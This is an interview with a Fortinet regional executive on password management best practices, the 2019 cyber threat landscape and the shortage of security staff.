Short, simple passwords take fewer resources for hackers to compromise. According to the Verizon Data Breach Investigations Report, 81% of breaches leveraged either stolen and/or weak passwords. That problem is compounded because one of the biggest risks to data security is the reuse of passwords across accounts. CIO AXIS talked to Rajesh Maurya, Regional Vice President, India & SAARC, Fortinet, to understand how employee passwords can be managed efficiently.
1.How much of link is there between poor password practices and data breaches/cyberattcks?
According to the Verizon Data Breach Investigations Report, 81% of breaches leveraged either stolen and/or weak passwords. That problem is compounded because one of the biggest risks to data security is the reuse of passwords across accounts. If one of the accounts is compromised and your user name and password are posted on the dark web, cybercriminals who know how often passwords are reused will simply begin to plug that information into other possible accounts until they unlock one that uses the exact same credentials.
This is a common risk, as 83% of people have admitted to reusing passwords across multiple sites. Even if it is safe to reuse passwords on accounts that don’t house sensitive data – a breach there can be used as an entryway to move laterally across networks in search of critical business data or personally identifiable information (PII).
Cyber adversaries are constantly tweaking their tradecraft to ensure successful intrusions in order to generate consistent revenue and profit. If your password is guessed or stolen or guessed, you may never know it happened until anomalous purchases appear in your bank account. And even more challenging, you may not be impacted directly at all. Data accessed by leveraging your compromised account may simply be used to move up the food chain, enabling an attacker to gain access to data and resources managed by someone else.
2. Most people think there are risks with using the same password but still do it. Why do you think that is?
One of the biggest mistakes people make is using the exact same password on all their online accounts. Of course, we tend to use a LOT of different websites, so remembering a unique password for each site may be impossible to keep track of.The average US email address is associated with 130 accounts. With so many passwords to remember, many have admitted to writing passwords down on pieces of paper or keeping a list of passwords in unsecured documents on their computers. These items can easily fall into the wrong hands – whether they are simply lost or are compromised in a malware attack.
There are two approaches to creating secure passwords. The first is to use a password vault that stores the username and password for each account, so all you have to remember is the single password for that application and it takes care of the rest. The other is to create a tier of applications and then create more complex passwords remember for each group. One set for sites like social media, another for places you pay your bills, and another for your online banking trnasactions.
Creating strong passwords you can remember isn’t as hard as it seems. For example, use the first letters of a sentence or song lyric that you are familiar with, add some capitalization and replace some of the letters with numbers or special characters and you’ve got a pretty secure password. Just set a reminder on your calendar to change those passwords every few weeks.
3. What best practice guidance you give to CISOs and CIOs about password management.
Short, simple passwords take fewer resources for hackers to compromise. In fact, hackers maintain databases of the most common words, phrases, and number combinations that they can run your password through to find a quick match. Some of the most common passwords are baseball and football team names, any variant of 123456789, and QWERTY. Avoid using common password themes when creating a passphrase, such as the following:
•Names including movies and sports teams
•Simple obfuscation of a common word (“P@$$w0rd”)
The best password is a strong passphrase, impossible to forget and difficult to guess, even for someone who knows personal details of your life like the name of the street you live. When creating new accounts or updating well-used passwords Fortinet security experts recommend to keep these six best practices in mind to minimize password-based cyber risk:
1.Add an extra layer of security, use multi-factor authentication wherever possible. This confirms your identity by utilizing a combination of multiple different factors, such as something you know or something they have, such as a token generator on your smartphone.
2.Never repeat the same password for different accounts.
3.Change your passphrase at least every three months. This will lock out cybercriminals who may be using your account, protect you from brute force attacks, and remedy the issue caused by cybercriminals who purchase lists of usernames and passwords obtained through data breaches.
4.Ensure no one is watching as you enter passwords.
5.Be cautious when downloading files from the internet as they may contain key loggers as well as password grabber malware variants that will compromise your password. A good practice is to regularly scan for the presence of such malware.
6.Use a cloud-based password manager to enable you to create and store strong passphrases. This is especially important if you require strong passwords for dozens of accounts. Password management tools allow you to securely store an encrypted list of passwords in the cloud that can be accessed from any device. Not only will you only need to remember one password to access your password locker, the passwords you store there for your various accounts can be even stronger because you don’t have to remember them.
4. What will the threat landscape look like in over the next 12 months?
Looking back at the threat landscape of the first quarter of 2019 shows that cybercriminals are not just becoming increasingly sophisticated in terms of their attack methods and tools, they are also becoming very diverse. Attackers are increasingly using a broad range of attack strategies, from targeted ransomware to custom coding, to living-off-the-land (LoTL) or sharing infrastructure to maximize their opportunities, and using pre-installed tools to move laterally and stealthily across a network before instigating an attack.
Ransomware Far From Gone: In general, previous high rates of ransomware have been replaced with more targeted attacks, but ransomware is far from gone. Instead, multiple attacks demonstrate it is being customized for high-value targets and to give the attacker privileged access to the network. The new ransomware variants demonstrate that security leaders need to remain focused on patching and backups against commodity ransomware, but targeted threats require more tailored defenses to protect against their unique attack methods.
Pre- and Post-Compromise Traffic: Research to see if threat actors carry out phases of their attacks on different days of the week demonstrates that cybercriminals are always looking to maximize opportunity to their benefit. When comparing Web filtering volume for two cyber kill chain phases during weekdays and weekends, pre-compromise activity is roughly three times more likely to occur during the work week, while post-compromise traffic shows less differentiation in that regard. This is primarily because exploitation activity often requires someone to take an action such as clicking on a phishing email. In contrast, command-and-control (C2) activity does not have this requirement and can occur anytime. Cybercriminals understand this and will work to maximize opportunity during the week when Internet activity is the most prevalent. Differentiating between weekday and weekend Web filtering practices is important to fully understand the kill chain of various attacks.
Majority of Threats Share Infrastructure: The degree to which different threats share infrastructure shows some valuable trends. Some threats leverage community-use infrastructure to a greater degree than unique or dedicated infrastructure. Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. Understanding what threats share infrastructure and at what points of the attack chain enables organizations to predict potential evolutionary points for malware or botnets in the future.
Content Management Needs Constant Management: Adversaries tend to move from one opportunity to the next in clusters, targeting successfully exploited vulnerabilities and technologies that are on the upswing, to quickly maximize opportunity. An example of new technologies getting a lot of attention from cybercriminals recently are Web platforms that make it easier for consumers and businesses to build Web presences. They continue to be targeted, even associated third party plugins. This reinforces the fact that it is critical that patches be applied immediately and to fully understand the constantly evolving world of exploits to stay ahead of the curve.
Tools and Tricks for Living Off the Land: Threat actors operate using the same business models as their victims, to maximize their efforts, attack methods often continue to develop even after gaining an initial entry. To accomplish this, threat actors increasingly leverage dual-use tools or tools that are already pre-installed on targeted systems to carry out cyberattacks. This “living off the land” (LoTL) tactic allows hackers to hide their activities in legitimate processes and makes it harder for defenders to detect them. These tools also make attack attribution much harder. Unfortunately, adversaries can use a wide range of legitimate tools to accomplish their goals and hide in plain sight. Smart defenders will need to limit access to sanctioned administrative tools and log use in their environments.
Establishing and maintaining proper defenses in a rapidly evolving threat landscape requires understanding threats before they happen, and that requires reliable and timely threat intelligence. Improving an organization’s ability to not only properly defend against current threat trends, but also prepare for the evolution and automation of attacks over time requires threat intelligence that is dynamic, proactive, and available throughout the distributed network. This knowledge can help identify trends showing the evolution of attack methods targeting the digital attack surface and to pinpoint cyber hygiene priorities based on where bad actors are focusing their efforts. The value and ability to take action on threat intelligence is severely diminished if it cannot be actionable in real time across each security device. Only a security fabric that is broad, integrated, and automated can provide protection for the entire networked environment, from IoT to the edge, network core and to multi-clouds at speed and scale.
5. In the backdrop of modern security landscape do you see more companies to appoint a CISO or CSO?
A 2019 Gartner survey shows the global talent shortage is now the top emerging risk facing organizations. The expansion of the digital marketplace has generated more jobs than the current supply of security professionals can meet. A problem of scale; there is currently not an efficient way to create skilled security practitioners at the same rate. Unfortunately, there are not enough skilled humans available to properly plan, manage, integrate, and optimize security devices, strategies, and protocols. For example, according to a recent workforce development survey, 59% of organizations have unfilled cybersecurity positions, with Frost & Sullivan forecasting a shortfall of 1.5 million by 2020.
Because of the expanding attack surface and proliferation of point security products and solutions, demand for security professionals has steadily increased just at the time when the shortage of available experienced security talent has never been greater. Currently, 22 percent of security leaders say their security teams are too small for their organization, and according to a recent workforce development survey, 59% of organizations have unfilled cybersecurity positions.Here are some descriptions of the requirements that C-suites and CISOs should include when seeking to fill these roles within the context of the modern threat landscape.
•Chief Information Security Officer – First, organizations must employ an experienced and effective CISO who is charged with building out the rest of the security team. The CISO must enable business and digital transformation through the effective use of security, with an eye toward cost-effectiveness and efficiency. An important function of the CISO is to work alongside the Chief Compliance Officer and General Counsel to ensure the organization operates within the standards set by various regulatory bodies. Ultimately, the CISO/CSO is responsible for the long-term security strategy of the organization, managing the budget and communicating with the C-suite and board on security KPIs and updates.
•Cybersecurity Architect – The Cybersecurity Architect plays an important strategic and tactical role within the organization, especially as security evolves to meet modern needs. To that end, the security architect is responsible for designing, implementing, and managing next-generation security deployments. This individual must work across lines of business to ensure that digital business enablement meets security requirements. As such, architects must be highly collaborative and well versed in engagement models such as DACI and RACI.
•VP/Director of Network Engineering/Network Operations – Typically reporting to the CIO or the VP of IT Infrastructure,the Head of Network Engineering and Operationsplays a key role in business enablement as well as security. This role requires a unique combination of hard technical skills, as well as soft skills like leadership and entrepreneurship.The selected candidate will need a clear understanding of the networking hardware and software deployed within the organization, and how they interoperate.
Once a team is established, CISOs must ensure that these individuals can work together in an integrated way across distributed networks to minimize the use of siloed, disparate solutions. Leveraging an integrated, architectural approach to security ensures that all of these team members receive the same information at the same time, thereby simplifying management of the NOC and SOC.